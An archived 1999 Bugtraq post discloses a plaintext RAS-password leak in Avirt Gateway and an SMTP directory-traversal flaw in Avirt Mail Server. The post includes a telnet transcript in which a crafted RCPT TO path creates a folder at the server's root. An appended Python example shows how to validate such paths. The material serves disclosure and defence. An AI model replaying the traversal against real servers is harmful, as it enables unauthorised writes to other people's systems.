[12425] in bugtraq


Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer

daemon@ATHENA.MIT.EDU (Jesús López de)
Wed Nov 3 16:36:55 1999

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-Id:  <00bc01bf2544$b50cc4e0$0100a8c0@eunate.net>
Date:         Tue, 2 Nov 1999 16:12:41 +0100
Reply-To: Jesús López de Aguileta <aguileta@EUNATE.NET>
From: Jesús López de Aguileta <aguileta@EUNATE.NET>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

----- Original Message -----
From: Luciano Martins <luck@USSRBACK.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, November 01, 1999 9:57 AM
Subject: Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
vulnerability


> Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow
> vulnerability

I posted another 2 bugs concerning Avirt Gateway and Avirt Mail Server 3.3 and
3.5 in BUGTRAQ-ES a month ago. I will try (excuse my poor English) to
translate this message here.

1) Anybody with console access could retrieve the RAS password in Avirt Gateway.

Changing the username in "Internet connection" properties and pressing the
"test" button makes Avirt present a message box with the password in
plaintext.

2) Anybody on the Intranet could make directories anywhere in the NT running
Avirt Mail Server.

telnet 192.168.0.1 25

> 220 server aVirt Mail SMTP Server Ready.
 mail from:foo
> 250 foo, Sender OK
 rcpt to:..\..\..\..\newfolder
> 250 ..\..\..\..\newfolder, Receipient OK
 data
> 354 Please enter mail, ending with a "." on a line by itself
 Textinside
 .
> 250 Mail accepted.

This will create a root folder named "newfolder" with a file inside it.
Fortunately it appears to be impossible to overwrite an existing directory.

Avirt has been notified about these security flaws on 23/8/99.

Regards

Jesús López de Aguileta
EunateNet
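
Added example (not part of the original message and not Avirt's code): how an SMTP server can map a RCPT TO argument to a mailbox directory without allowing the `..\` traversal shown in the transcript above. The spool path, the function names and the "naive" join pattern are assumptions for illustration; the message does not say how Avirt builds its paths.

```python
import ntpath  # Windows path semantics, importable on any OS
import re

SPOOL_ROOT = r"C:\MailSpool"  # hypothetical spool directory (assumption)

# Conservative allow-list for a mailbox name (assumption, not RFC 5321-complete):
# no separators, no drive or stream colon, no leading or trailing dot.
LOCAL_PART = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9._+-]{0,62}[A-Za-z0-9])?")


class RejectedRecipient(ValueError):
    """The RCPT TO argument must not be turned into a filesystem path."""


def naive_mailbox_dir(rcpt, spool_root=SPOOL_ROOT):
    """Assumed flawed pattern: recipient text joined straight onto the spool."""
    return ntpath.normpath(ntpath.join(spool_root, rcpt))


def is_inside(root, candidate):
    """True only if candidate is a strict descendant of root (case-insensitive)."""
    r = ntpath.normcase(ntpath.normpath(root))
    c = ntpath.normcase(ntpath.normpath(candidate))
    try:
        return c != r and ntpath.commonpath([r, c]) == r
    except ValueError:  # different drives, or absolute mixed with relative
        return False


def safe_mailbox_dir(rcpt, spool_root=SPOOL_ROOT):
    """Map a RCPT TO argument to a directory under spool_root, or raise."""
    local = rcpt.strip().strip("<>").split("@", 1)[0]
    # Layer 1: reject anything that is not a plain mailbox name.
    if not LOCAL_PART.fullmatch(local) or ".." in local:
        raise RejectedRecipient(f"illegal mailbox name: {rcpt!r}")
    # Layer 2: verify containment after normalisation, in case layer 1 is loosened.
    candidate = ntpath.normpath(ntpath.join(spool_root, local))
    if not is_inside(spool_root, candidate):
        raise RejectedRecipient(f"path escapes spool: {rcpt!r}")
    return candidate


if __name__ == "__main__":
    for rcpt in ("alice@example.com", r"..\..\..\..\newfolder"):  # constructed inputs
        print("naive:", naive_mailbox_dir(rcpt))
        try:
            print("safe: ", safe_mailbox_dir(rcpt))
        except RejectedRecipient as exc:
            print("safe:  rejected,", exc)
```

A server using this check would answer the traversal recipient with a 5xx rejection at RCPT TO, before any DATA is accepted or any directory is created.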
